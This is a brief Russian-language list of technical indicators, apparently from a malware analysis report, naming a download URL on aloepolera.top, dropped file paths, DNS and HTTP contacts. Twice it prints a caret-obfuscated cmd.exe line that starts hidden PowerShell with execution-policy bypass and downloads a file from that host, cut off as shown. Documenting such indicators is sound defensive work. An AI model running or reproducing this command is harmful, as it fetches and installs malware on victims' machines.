Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^O^WErSHeLL.ExE -E^x^EC^Utio^NP^OLICy ^bY^PaSS^ ^-nOPROfILE ^-win^DoW^STY^L^e hi^dDEn (^n^Ew^-OBject S^YSteM.N^e^T^.^weB^cLi^eNT^).DOWNl^o^A^DFi^L^E^(^'http://aloepolera...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /C "p^O^WErSHeLL.ExE -E^x^EC^Utio^NP^OLICy ^bY^PaSS^ ^-nOPROfILE ^-win^DoW^STY^L^e hi^dDEn (^n^Ew^-OBject S^YSteM.N^e^T^.^weB^cLi^eNT^).DOWNl^o^A^DFi^L^E^(^'http://aloepolera... (со скрытым окном)